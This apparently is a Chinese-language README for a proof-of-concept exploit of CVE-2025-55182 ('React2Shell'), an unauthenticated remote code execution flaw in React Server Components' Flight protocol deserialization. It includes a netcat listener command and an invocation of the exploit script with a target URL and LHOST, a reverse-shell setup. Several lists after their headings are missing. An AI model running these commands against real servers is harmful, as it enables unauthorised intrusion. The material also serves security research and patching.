概念验证漏洞利用,针对CVE-2025-55182 (React2Shell),一个通过精心构造的Flight协议载荷在React Server Components中实现未经身份验证的远程代码执行漏洞。
CVE-2025-55182,又称 React2Shell,是一个严重的未认证远程代码执行(RCE) 漏洞,影响 React 服务端组件包(版本 19.0、19.1.0、19.1.1 和 19.2.0)。
该漏洞可能允许攻击者通过单个精心构造的 HTTP 请求在易受攻击的服务器上实现任意代码执行,无需进行身份验证。
React 服务端组件使用 Flight 协议在客户端和服务器之间序列化和反序列化组件数据。
此反序列化过程中的不当验证可能允许精心构造的载荷操纵内部对象结构,并触及危险的 JavaScript 执行原语。
该漏洞源于 React 服务端组件(RSC)Flight 协议载荷在反序列化过程中验证不充分。
精心构造的载荷可能:
multipart/form-data 请求在您的机器上启动监听器:
nc -lvnp 4444
运行漏洞利用脚本:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
为缓解此漏洞:
本项目严格仅供以下用途:
作者对因使用本材料导致的误用或损害概不负责。用户有责任遵守所有适用的法律法规。